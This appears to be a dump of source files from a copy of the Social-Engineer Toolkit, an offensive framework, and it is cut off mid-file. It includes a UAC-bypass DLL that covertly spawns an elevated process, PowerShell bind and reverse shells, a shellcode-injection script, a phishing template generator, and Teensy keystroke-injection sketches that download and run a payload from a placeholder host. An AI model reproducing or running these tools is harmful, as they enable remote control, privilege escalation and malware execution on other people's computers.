| {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32 52 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32 53 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32 54 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = 
Release|x64 55 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.Build.0 = Release|x64 56 | EndGlobalSection 57 | GlobalSection(SolutionProperties) = preSolution 58 | HideSolutionNode = FALSE 59 | EndGlobalSection 60 | EndGlobal 61 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Win7Elevate.rc 4 | // 5 | #define IDD_EMBEDDED_DLL 110 6 | #define IDD_EMBEDDED_TIOR 111 7 | 8 | // Next default values for new objects 9 | // 10 | #ifdef APSTUDIO_INVOKED 11 | #ifndef APSTUDIO_READONLY_SYMBOLS 12 | #define _APS_NO_MFC 1 13 | #define _APS_NEXT_RESOURCE_VALUE 139 14 | #define _APS_NEXT_COMMAND_VALUE 32771 15 | #define _APS_NEXT_CONTROL_VALUE 1000 16 | #define _APS_NEXT_SYMED_VALUE 111 17 | #endif 18 | #endif 19 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.cpp -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.rc: -------------------------------------------------------------------------------- 1 | // Microsoft Visual C++ generated resource script. 2 | // 3 | #include "resource.h" 4 | 5 | #define APSTUDIO_READONLY_SYMBOLS 6 | ///////////////////////////////////////////////////////////////////////////// 7 | // 8 | // Generated from the TEXTINCLUDE 2 resource. 
9 | // 10 | #ifndef APSTUDIO_INVOKED 11 | #include "targetver.h" 12 | #endif 13 | #define APSTUDIO_HIDDEN_SYMBOLS 14 | #include "windows.h" 15 | #undef APSTUDIO_HIDDEN_SYMBOLS 16 | 17 | ///////////////////////////////////////////////////////////////////////////// 18 | #undef APSTUDIO_READONLY_SYMBOLS 19 | 20 | ///////////////////////////////////////////////////////////////////////////// 21 | // English (U.S.) resources 22 | 23 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU) 24 | #ifdef _WIN32 25 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 26 | #pragma code_page(1252) 27 | #endif //_WIN32 28 | 29 | #ifdef APSTUDIO_INVOKED 30 | ///////////////////////////////////////////////////////////////////////////// 31 | // 32 | // TEXTINCLUDE 33 | // 34 | 35 | 1 TEXTINCLUDE 36 | BEGIN 37 | "resource.h\0" 38 | END 39 | 40 | 2 TEXTINCLUDE 41 | BEGIN 42 | "#ifndef APSTUDIO_INVOKED\r\n" 43 | "#include ""targetver.h""\r\n" 44 | "#endif\r\n" 45 | "#define APSTUDIO_HIDDEN_SYMBOLS\r\n" 46 | "#include ""windows.h""\r\n" 47 | "#undef APSTUDIO_HIDDEN_SYMBOLS\r\0" 48 | END 49 | 50 | 3 TEXTINCLUDE 51 | BEGIN 52 | "#include ""Win7Elevate.rc2\0" 53 | END 54 | 55 | #endif // APSTUDIO_INVOKED 56 | 57 | #endif // English (U.S.) 
resources 58 | ///////////////////////////////////////////////////////////////////////////// 59 | 60 | 61 | 62 | #ifdef _DEBUG 63 | 64 | #ifdef _WIN64 65 | IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll" 66 | IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe" 67 | #else 68 | IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll" 69 | IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe" 70 | #endif 71 | 72 | #else // _DEBUG 73 | 74 | #ifdef _WIN64 75 | IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll" 76 | IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe" 77 | #else 78 | IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll" 79 | IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe" 80 | #endif 81 | 82 | #endif 83 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | Source Files 43 | 44 | 45 | Source Files 46 | 47 | 48 | Source Files 49 | 50 | 51 | Source Files 52 | 53 | 54 | 55 | 56 | Resource Files 57 | 58 | 59 | -------------------------------------------------------------------------------- 
/src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | false 5 | /c cmd 6 | /c cmd 7 | WindowsLocalDebugger 8 | WindowsLocalDebugger 9 | /c cmd 10 | /c cmd 11 | WindowsLocalDebugger 12 | WindowsLocalDebugger 13 | 14 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate_Inject.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | namespace W7EInject 4 | { 5 | void AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName, 6 | const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir, 7 | const wchar_t *szPathToOurDll, 8 | DWORD (__stdcall *Redirector)(void)); 9 | } 10 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate_Utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | namespace W7EUtils 4 | { 5 | bool GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs); 6 | 7 | bool OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName); 8 | 9 | bool GetElevationType(TOKEN_ELEVATION_TYPE * ptet); 10 | 11 | template < typename T > class GetProcAddr 12 | { 13 | public: 14 | T f; 15 | 16 | __forceinline GetProcAddr(FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName), HMODULE hModule, const char *lpProcName) 17 | { 18 | f = reinterpret_cast< T >(fpGetProcAddress(hModule, lpProcName)); 19 | } 20 | }; 21 | 22 | class CTempResource 23 | { 24 | private: 25 | HINSTANCE m_hInstance; 26 | int m_iResourceId; 27 | std::wstring m_strFilePath; 28 | public: 29 | CTempResource(HINSTANCE hInstance, int iResourceId); 30 | virtual 
~CTempResource(); 31 | bool GetFilePath(std::wstring &strPath); 32 | }; 33 | 34 | class CRemoteMemory 35 | { 36 | private: 37 | HANDLE m_hRemoteProcess; 38 | std::list< void * > m_listRemoteAllocations; 39 | bool m_bAnyFailures; 40 | 41 | private: 42 | CRemoteMemory(const CRemoteMemory &rhs); // Disallow. 43 | CRemoteMemory &operator=(const CRemoteMemory &rhs); // Disallow. 44 | 45 | public: 46 | CRemoteMemory(HANDLE hRemoteProcess); 47 | virtual ~CRemoteMemory(); 48 | void LeakMemory(); 49 | bool AnyFailures() const; 50 | void *AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst = true); 51 | wchar_t *AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst = true); 52 | char *AllocAndCopyMemory(const char *szLocalString, bool bConst = true); 53 | }; 54 | } 55 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Win7Elevate.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | 11 | #if defined _M_IX86 12 | 13 | #pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' 
processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"") 14 | 15 | #elif defined _M_X64 16 | 17 | #pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"") 18 | 19 | #endif 20 | 21 | 22 | 23 | #include 24 | 25 | #include 26 | #include 27 | 28 | #include 29 | 30 | #include 31 | #include 32 | #include 33 | 34 | #include 35 | #include 36 | #include 37 | 38 | #ifndef FOFX_REQUIREELEVATION 39 | #define FOFX_REQUIREELEVATION (0x10000000) 40 | #endif 41 | 42 | #ifndef FOFX_DONTDISPLAYLOCATIONS 43 | #define FOFX_DONTDISPLAYLOCATIONS (0x80000000) 44 | #endif 45 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/Win7ElevateDll.cpp: -------------------------------------------------------------------------------- 1 | // Win7ElevateDll.cpp : Defines the exported functions for the DLL application. 
2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | 7 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/Win7ElevateDll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/Win7ElevateDll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | 3 | #include 4 | 5 | #include ".\..\CMMN.h" 6 | 7 | #include 8 | #include 9 | 10 | BOOL APIENTRY DllMain( HMODULE hModule, 11 | DWORD ul_reason_for_call, 12 | LPVOID lpReserved 13 | ) 14 | { 15 | // 16 | // Simple stub code that is used to create EXE within a alevated process. 17 | // Wee need to hide fact that we've started process thats why we immediately 18 | // Terminate host application. 
19 | // 20 | CLogger::LogLine(TEXT("DLL: Hello")); 21 | 22 | switch (ul_reason_for_call) 23 | { 24 | case DLL_PROCESS_ATTACH: 25 | { 26 | // 27 | // Obtaining TIOR path to be used for CreateProcess call 28 | // 29 | std::wstring cmd; 30 | CInterprocessStorage::GetString( TEXT("w7e_TIORPath"), cmd ); 31 | 32 | STARTUPINFO startupInfo = {0}; 33 | startupInfo.cb = sizeof(startupInfo); 34 | PROCESS_INFORMATION processInfo = {0}; 35 | 36 | CLogger::LogLine(TEXT("DLL: TIOR shell=")); 37 | CLogger::LogLine(cmd); 38 | 39 | // 40 | // Create not visible window 41 | // 42 | if (CreateProcess(cmd.c_str(), NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW * 1, NULL, NULL, &startupInfo, &processInfo)) 43 | { 44 | CloseHandle(processInfo.hProcess); 45 | CloseHandle(processInfo.hThread); 46 | } 47 | 48 | ExitProcess(-69); 49 | } 50 | break; 51 | case DLL_THREAD_ATTACH: 52 | case DLL_THREAD_DETACH: 53 | case DLL_PROCESS_DETACH: 54 | break; 55 | } 56 | return TRUE; 57 | } 58 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Win7ElevateDll.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | 
#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | #include 18 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7ElevateDll/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | #include 18 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/x64.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/uac_bypass/x64.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/x86.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/uac_bypass/x86.binary -------------------------------------------------------------------------------- /src/phishing/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/phishing/__init__.py -------------------------------------------------------------------------------- /src/phishing/smtp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/phishing/smtp/__init__.py -------------------------------------------------------------------------------- /src/phishing/smtp/client/__init__.py: -------------------------------------------------------------------------------- 
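https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/phishing/smtp/client/__init__.py -------------------------------------------------------------------------------- /src/phishing/smtp/client/custom_template.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
"""Interactively collect an author, subject and body and write them to a
randomly named ``.template`` file under ``src/templates/``."""
import random
from src.core import setcore as core

try:
    print("\n [****] Custom Template Generator [****]\n")
    print("\n Always looking for new templates! In the set/src/templates directory send an email\nto davek@secmaniac.com if you got a good template!")
    author = raw_input(core.setprompt("0", "Name of the author"))

    # Random numeric file name. The file is opened with "w" below, so a
    # collision with an existing template overwrites it.
    randomgen = random.randrange(1, 99999999999999999999)
    filename = str(randomgen) + ".template"

    subject = raw_input(core.setprompt("0", "Email Subject"))

    # Start from an empty body so that Ctrl+C at the very first body prompt
    # does not leave `body` undefined, which previously raised NameError after
    # the file had already been created and partly written.
    body = ""
    try:
        body = raw_input(core.setprompt("0", "Message Body, hit return for a new line. Control+c when you are finished"))
        # The loop normally ends on Ctrl+C; the comparison only fails if the
        # first line typed is exactly this string.
        while body != 'sdfsdfihdsfsodhdsofh':
            try:
                # Raw string: a literal backslash followed by "n" is appended,
                # not a newline, so the whole body stays on one line of the file.
                body += r"\n"
                body += raw_input("Next line of the body: ")
            except KeyboardInterrupt:
                break
    except KeyboardInterrupt:
        pass

    # NOTE(review): subject and body are written between double quotes with no
    # escaping, so a '"' typed at the prompt ends the quoted value early. How
    # the template reader parses these lines is not visible here - confirm.
    # The context manager closes the file even when a write raises.
    with open("src/templates/%s" % filename, "w") as filewrite:
        filewrite.write("# Author: " + author + "\n#\n#\n#\n")
        filewrite.write('SUBJECT=' + '"' + subject + '"\n\n')
        filewrite.write('BODY=' + '"' + body + '"\n')
    print("\n")
except Exception as e:
    print(" An error occured, printing error message: " + str(e))
-------------------------------------------------------------------------------- /src/powershell/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/powershell/__init__.py -------------------------------------------------------------------------------- /src/powershell/bind.powershell: -------------------------------------------------------------------------------- 1 | # 2 | # PowerShell Bind by Josh Kelley (winfang) and Dave Kennedy (ReL1K) 3 | # Defcon Release 4 | # 5 | # 6 | # 7 | 8 | $encoding = new-object System.Text.AsciiEncoding 9 | $endpoint = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, "PORTHERE") 10 | $listener = new-object System.Net.Sockets.TcpListener $endpoint 11 | $listener.start() 12 | $socket = $listener.AcceptTcpClient() 13 | $networkstream = $socket.GetStream() 14 | $networkbuffer = New-Object System.Byte[] $socket.ReceiveBufferSize 15 | $process = New-Object System.Diagnostics.Process 16 | $process.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe" 17 | $process.StartInfo.RedirectStandardInput = 1 18 | $process.StartInfo.RedirectStandardOutput = 1 19 | $process.StartInfo.UseShellExecute = 0 20 | $process.Start() 21 | $inputstream = $process.StandardInput 22 |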
$outputstream = $process.StandardOutput 23 | 24 | Start-Sleep 1 25 | 26 | while($outputstream.Peek() -ne -1){ 27 | $string += $encoding.GetString($outputstream.Read()) 28 | } 29 | $networkstream.Write($encoding.GetBytes($string),0,$string.Length) 30 | $string = '' 31 | $done = $false 32 | while (-not $done) { 33 | $pos = 0 34 | $i = 1 35 | while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { 36 | $read = $networkstream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) 37 | $pos+=$read 38 | if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) { 39 | break 40 | } 41 | } 42 | if ($pos -gt 0) { 43 | $string = $encoding.GetString($networkbuffer,0,$pos) 44 | $inputstream.write($string) 45 | 46 | # Write Output 47 | $out = $encoding.GetString($outputstream.Read()) 48 | while($outputstream.Peek() -ne -1){ 49 | $out += $encoding.GetString($outputstream.Read()) 50 | } 51 | $networkstream.Write($encoding.GetBytes($out),0,$out.length) 52 | $out = $null 53 | } 54 | else { 55 | $done = $true 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /src/powershell/reverse.powershell: -------------------------------------------------------------------------------- 1 | function cleanup { 2 | if ($client.Connected -eq $true) {$client.Close()} 3 | if ($process.ExitCode -ne $null) {$process.Close()} 4 | exit} 5 | // Setup IPADDR 6 | $address = 'IPADDRHERE' 7 | // Setup PORT 8 | $port = 'PORTHERE' 9 | $client = New-Object system.net.sockets.tcpclient 10 | $client.connect($address,$port) 11 | $stream = $client.GetStream() 12 | $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize 13 | $process = New-Object System.Diagnostics.Process 14 | $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' 15 | $process.StartInfo.RedirectStandardInput = 1 16 | $process.StartInfo.RedirectStandardOutput = 1 17 | $process.StartInfo.UseShellExecute = 0 18 | $process.Start() 19 | $inputstream = $process.StandardInput 20 | 
$outputstream = $process.StandardOutput 21 | Start-Sleep 1 22 | $encoding = new-object System.Text.AsciiEncoding 23 | while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())} 24 | $stream.Write($encoding.GetBytes($out),0,$out.Length) 25 | $out = $null; $done = $false; $testing = 0; 26 | while (-not $done) { 27 | if ($client.Connected -ne $true) {cleanup} 28 | $pos = 0; $i = 1 29 | while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { 30 | $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) 31 | $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} 32 | if ($pos -gt 0) { 33 | $string = $encoding.GetString($networkbuffer,0,$pos) 34 | $inputstream.write($string) 35 | start-sleep 1 36 | if ($process.ExitCode -ne $null) {cleanup} 37 | else { 38 | $out = $encoding.GetString($outputstream.Read()) 39 | while($outputstream.Peek() -ne -1){ 40 | $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}} 41 | $stream.Write($encoding.GetBytes($out),0,$out.length) 42 | $out = $null 43 | $string = $null}} else {cleanup}} 44 | -------------------------------------------------------------------------------- /src/powershell/shellcode_injection.powershell: -------------------------------------------------------------------------------- 1 | $code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = SHELLCODEHERE;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = 
$sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 }; 2 | 3 | -------------------------------------------------------------------------------- /src/qrcode/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/qrcode/__init__.py -------------------------------------------------------------------------------- /src/qrcode/qrgenerator.py: -------------------------------------------------------------------------------- 1 | from src.qrcode.qrcode import * 2 | from src.core.setcore import * 3 | import os 4 | 5 | # generate the qrcode and save it definition 6 | def gen_qrcode(url): 7 | # generate the qrcode 8 | qr = QRCode(5, QRErrorCorrectLevel.L) 9 | qr.addData(url) 10 | qr.make() 11 | im = qr.makeImage() 12 | time.sleep(1) 13 | if os.path.isfile(setdir + "/reports/qrcode_attack.png"): os.remove(setdir + "/reports/qrcode_attack.png") 14 | # save the image out 15 | im.save(setdir + "/reports/qrcode_attack.png", format='png') 16 | # print that its been successful 17 | print_status("QRCode has been generated under %s/reports/qrcode_attack.png!" 
% (setdir)) 18 | -------------------------------------------------------------------------------- /src/teensy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/teensy/__init__.py -------------------------------------------------------------------------------- /src/teensy/gnome_wget.pde: -------------------------------------------------------------------------------- 1 | /** gnome_wget.pde 2 | * 3 | * Author: Hugo Caron (y0ug) 4 | * Date: 2011/03/19 5 | * 6 | * 7 | * Teensy pde for Linux with the GNOME desktop and wget 8 | * - Open "run an application" window (ALT-F2) 9 | * - Type a command that downloads a file with wget into the tmp folder and runs it 10 | * 11 | * Note: I only tested this on my laptop under Ubuntu 10.10 12 | * 13 | * Based on code from the Social-Engineer Toolkit, Teensy Attack Vector 14 | * Thanks to Dave Kennedy (ReL1K) for the pde example 15 | * 16 | * ReL1K: Added x.exe extension even though they are ELF binaries; it won't make a difference, 17 | * just easier to not recode and leave it the same. 
18 | * 19 | */ 20 | 21 | #define PAYLOAD "/bin/sh -c \"\ 22 | wget -O /tmp/x http://IPADDR/x.exe &&\ 23 | chmod +x /tmp/x && \ 24 | /tmp/x \ 25 | \"" 26 | 27 | void setup() { 28 | delay(5000); 29 | exec_gnome(PAYLOAD); 30 | } 31 | 32 | void loop() { 33 | delay(1000000); 34 | } 35 | 36 | void exec_gnome(char *SomeCommand){ 37 | // Press ALT-F2 ( Gnome - "run an application" window ) 38 | Keyboard.set_modifier(MODIFIERKEY_ALT); 39 | Keyboard.set_key1(KEY_F2); 40 | Keyboard.send_now(); 41 | 42 | // Set blank key 43 | Keyboard.set_modifier(0); 44 | Keyboard.set_key1(0); 45 | Keyboard.send_now(); 46 | 47 | delay(1500); 48 | 49 | // Send the command 50 | Keyboard.print(SomeCommand); 51 | Keyboard.set_key1(KEY_ENTER); 52 | Keyboard.send_now(); 53 | 54 | // Reset key 55 | Keyboard.set_key1(0); 56 | Keyboard.send_now(); 57 | } 58 | -------------------------------------------------------------------------------- /src/teensy/osx_sd2teensy.pde: -------------------------------------------------------------------------------- 1 | /* 2 | Teensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K) 3 | Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile 4 | */ 5 | 6 | // This the Mac version :) This does not execute the code, but it does copy from the SD. 7 | 8 | #include 9 | #include 10 | 11 | // Teensy ++ LED is 6. Teensy the LED is 11. 12 | int ledPin = 6; 13 | 14 | void setup() 15 | { 16 | BlinkFast(2); 17 | delay(5000); 18 | CommandAtSpotlight("Terminal"); 19 | delay(7500); 20 | // Replace file name with evil file 21 | Keyboard.println("nano /tmp/test.txt"); 22 | delay(1000); 23 | // This is the SS pin on the Teensy. Pin 20 on the Teensy ++. Pin 0 on the Teensy. 
24 | const int chipSelect = 20; 25 | 26 | // make sure that the default chip select pin is set to 27 | // output, even if you don't use it: 28 | pinMode(10, OUTPUT); 29 | 30 | // see if the card is present and can be initialized: 31 | if (!SD.begin(chipSelect)) { 32 | Serial.println("Card failed, or not present"); 33 | // don't do anything more: 34 | return; 35 | } 36 | 37 | // open the file. note that only one file can be open at a time, 38 | // so you have to close this one before opening another. 39 | // Larger the file, more likely it wouldn't fit in a normal int var. 40 | // This is the workaround for it. 41 | long int filePos; 42 | long int fileSize; 43 | File dataFile = SD.open("converts.txt"); 44 | if (dataFile) { 45 | fileSize = dataFile.size(); 46 | Keyboard.println("Start File"); 47 | for (filePos = 0; filePos <= fileSize; filePos++) { 48 | Keyboard.print(dataFile.read(),BYTE); 49 | // Large files take a while to write out...this delay helps keep the keyboard on tract. 50 | delay(10); 51 | //Serial.print(dataFile.read(),BYTE); 52 | } 53 | dataFile.close(); 54 | Keyboard.println("End File"); 55 | } 56 | else 